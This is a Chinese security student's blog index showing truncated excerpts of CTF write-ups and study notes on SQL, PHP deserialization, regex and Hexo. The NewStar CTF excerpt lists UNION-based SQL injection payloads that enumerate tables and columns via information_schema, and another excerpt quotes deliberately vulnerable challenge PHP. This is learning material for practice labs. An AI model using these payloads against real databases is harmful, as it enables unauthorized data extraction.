newstar ctf复现week1让我皮蛋看看 flag 都藏哪了在输入框输入1 and 1=1和1 and 1=2，发现第二次输入没有显示 说明是数字型注入，这里使用UNION注入 先看看列数多少 1 ORDER BY 2正确显示 1 ORDER BY 3报错 列数为2 判断回显位置 -1 UNION SELECT 1,2 返回 12Name: "1"Position: "2" 可以爆表了 123-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --所有表单名字-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='Fl4g' --所有列名-1 union select 1,group_concat(0x5c,id,0x5c,des,0x ...

php反序列化 https://www.cnblogs.com/fish-pompom/p/11126473.html 从序列化到反序列化PHP 序列化（Serialization）是将 PHP 变量转换为可以存储或传输的字符串格式的过程。序列化的主要目的是保存变量的状态，以便可以在稍后的时间点恢复该状态。这个过程通过 serialize() 函数来完成。序列化的数据可以被存储在文件、数据库中，或者在网络上传输。 这其实是为了解决 PHP 对象传递的一个问题,因为 PHP 文件在执行结束以后就会将对象销毁，那么如果下次有一个页面恰好要用到刚刚销毁的对象就会束手无策，总不能你永远不让它销毁，等着你吧，于是人们就想出了一种能长久保存对象的方法，这就是 PHP 的序列化，那当我们下次要用的时候只要反序列化一下就 ok 啦 序列化的作用 持久化存储：将复杂的数据结构（如对象或数组）保存到文件或数据库中，以便以后可以读取和使用 数据交换：通过网络传输数据时，确保数据结构的一致性和完整性 缓存：将计算结果序列化后存储起来，以避免重复计算，提高性能序列化的过程 当你调用 serialize() ...

后端学习sql数据库管理、php语言、sql注入(持续更新) 参考 https://www.bilibili.com/video/BV16D4y167TT/?spm_id_from=333.880.my_history.page.click https://www.runoob.com/sql/sql-tutorial.html https://www.bilibili.com/video/BV1aS4y1W78p?p=2&vd_source=06887b49ed0996e8a27c4d84f89315d3 https://blog.csdn.net/qq_55316925/article/details/129147618 在web方向网络安全的渗透学习中，我发现如果仅仅只是为了做题的需要才去学习碎片的、部分的sql和php语言知识，是不成体系的，对之后的深入学习会造成阻碍 所以，系统地学习基本后端知识迫在眉睫，为之后的深入打好基础 SQL数据库管理基础入门(基于phpstudy学习)SQL（Structured Query Language）是一种用于管理和操作关系数 ...

sql靶场搭建和刷题sql-labs靶场的搭建可以选择使用docker或者phpstudy，但是既然是大人了，那么两个我都要( 参考文章 https://blog.csdn.net/weixin_44355653/article/details/140267707https://blog.csdn.net/ZL_1618/article/details/132684977 参考视频 https://www.bilibili.com/video/BV1aS4y1W78p?p=2&vd_source=06887b49ed0996e8a27c4d84f89315d3 一.使用docker搭建(折磨人第一步)1.docker是基于Linux系统的软件，所以只有windows系统的我们需要一个linux系统 首先需要虚拟机VMware workstation pro，以及ubuntu系统的镜像，使用VM载入ubuntu系统并调试好它(这并不是本文重点所以这里不细讲过程) 2.右键ubuntu的桌面，点击在终端打开，先输入su -获得root权限避免之后莫名其妙的权限问题 3.检查 ...

BaseCTF2024的赛题review和study log一.A Dark Room(入门)F12直接打开源码看，得到flag 二.flag直接读取不就行了?(简单，但是对我来说不简单)获取容器网址后进入显示 1234567891011121314<?phphighlight_file('index.php');# 我把flag藏在一个secret文件夹里面了，所以要学会遍历啊~error_reporting(0);$J1ng = $_POST['J'];$Hong = $_POST['H'];$Keng = $_GET['K'];$Wang = $_GET['W'];$dir = new $Keng($Wang);foreach($dir as $f) { echo($f . '<br>');}echo new $J1ng($Hong);?> 作为一个零基础小白，自然是不会做的，直接去搜wp，然后根据wp反推考察的 ...

regex正则表达式的基本语法学习 regex学习网站https://regexlearn.com/zh-cn/learn 一.基本匹配[]匹配括号内所有的字符 [^]匹配除了括号内的所有字符 [a-z]匹配在一个字符串中a到z之间的所有字符，字母换成数字也是可以的 .匹配任意字符 二.重复*在一个字符后面加上*，表示该字符完全不去匹配或者可以多次匹配，等价于{0,} +在一个字符后面加上+，表示该字符可以出现一次或者多次，这跟*有些区别，等价于{1,} ?在一个字符后面加上?，表示该字符可有可无，以此进行匹配，等价于{0,1} {}在一个字符后面加上这个大括号，括号里面填的是数字，表示该字符重复出现的确切次数，以此来匹配 {2,3}括号的用法和上面一样，但是里面加了一个区间 意思是匹配该字符重复出现2到3次的字符串 如果不写右端点，如{2,}表示选择那些至少重复出现2次该字符的字符串 组合运用[0-9]{4}这个意思是在单个数字0至9的范围 ...

留白的个人博客搭建 参考文章 https://blog.fiveth.cc/p/bb32/ 【零成本】Hexo个人博客搭建教程 | 无需服务器_哔哩哔哩_bilibili我是参考了Monday的blog搭建过程，同样采用Hexo框架， 参考Mondaying的md书写格式 一.准备工作1.首先去下载了node.js和git,然后检验是否下载成功 运气很好，没报什么错误 2.但是在下载Hexo的时候出现问题 先是测试下载了express，打开cmd输入npm install express -g出现报错 12345678910 npm error code ECONNRESETnpm error syscall readnpm error errno ECONNRESETnpm error network request to https://registry.npmjs.org/express failed, reason: read ECONNRESETnpm error network This is a problem related to network ...